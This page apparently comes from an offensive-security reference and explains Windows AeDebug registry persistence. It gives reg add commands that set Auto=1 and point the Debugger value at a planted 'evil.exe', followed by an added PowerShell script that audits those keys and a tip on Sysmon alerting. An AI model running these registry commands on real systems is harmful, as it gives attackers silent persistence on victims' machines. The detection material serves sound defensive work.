AEDebug Keys Persistence
Theory
AEDebug Keys is a persistence and backdoor technique that leverages the Windows registry's Debugger property to execute a specified executable when a process crashes. The level of access gained depends on the security context of the debugged process. Additionally, if the Auto property of the same registry key is set to 1, the debugger launches automatically without requiring user interaction, further enhancing persistence.
Practice
Once AeDebug has been edited, the original debugger executable no longer starts.
You can run malicious code instead of the debugger by editing the Auto and Debugger values under the following keys:
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\AeDebug
HKCU\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\AeDebug
# Starts without user interaction
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AeDebug" /v "Auto" /t REG_SZ /d "1"
# Edit debugger
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AeDebug" /v "Debugger" /d "C:\Temp\evil.exe"
# Or
# Starts without user interaction
reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\AeDebug" /v "Auto" /t REG_SZ /d "1"
# Edit debugger
reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\AeDebug" /v "Debugger" /d "C:\Temp\evil.exe"
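The following audit script is an added example, not code from the original page: it reads the AeDebug keys listed above (plus their HKCU counterparts) and flags the settings this technique relies on. The allowlist of expected debugger images and the user-writable path patterns are assumptions to tune for your own hosts.

```powershell
# Added audit script, not from the original page. Reads the AeDebug keys the
# page lists (plus their HKCU counterparts) and flags the settings this
# technique relies on. The allowlist of expected debugger images and the
# user-writable path patterns are assumptions; tune them for your estate.

$AeDebugKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AeDebug',
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\AeDebug',
    'HKCU:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AeDebug',
    'HKCU:\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\AeDebug'
)

# Debugger images you expect to see in a Debugger value (assumption)
$ExpectedDebuggers = @('vsjitdebugger.exe', 'windbg.exe', 'windbgx.exe', 'drwtsn32.exe')

function Test-AeDebugKey {
    param([Parameter(Mandatory)][string]$Path)

    $result = [ordered]@{ Key = $Path; Auto = $null; Debugger = $null; Findings = @() }
    if (-not (Test-Path -Path $Path)) {
        $result.Findings += 'key not present'
        return [pscustomobject]$result
    }

    $props = Get-ItemProperty -Path $Path -ErrorAction SilentlyContinue
    $result.Auto     = $props.Auto
    $result.Debugger = $props.Debugger

    # Auto=1 means the debugger is launched on a crash without any prompt
    if ("$($props.Auto)" -eq '1') { $result.Findings += 'Auto=1: debugger runs without user interaction' }

    if ($props.Debugger) {
        # Pull the image name out of the command line (value is often quoted and carries -p/-e args)
        $image = [regex]::Match($props.Debugger, '(?i)[^\\"]+\.exe').Value.ToLower()
        if ($image -and ($ExpectedDebuggers -notcontains $image)) {
            $result.Findings += "unexpected debugger image: $image"
        }
        # A debugger living in a user-writable directory is a classic sign of a planted binary
        if ($props.Debugger -match '(?i)\\(Temp|Users\\Public|AppData|ProgramData)\\') {
            $result.Findings += 'debugger path is in a user-writable location'
        }
    }
    return [pscustomobject]$result
}

$AeDebugKeys | ForEach-Object { Test-AeDebugKey -Path $_ } |
    Select-Object Key, Auto, Debugger, @{ n = 'Findings'; e = { $_.Findings -join '; ' } } |
    Format-Table -AutoSize -Wrap
```

Beyond a periodic audit, writes to the Auto and Debugger values under these keys are worth alerting on directly (Sysmon Event ID 13, registry value set, covers them).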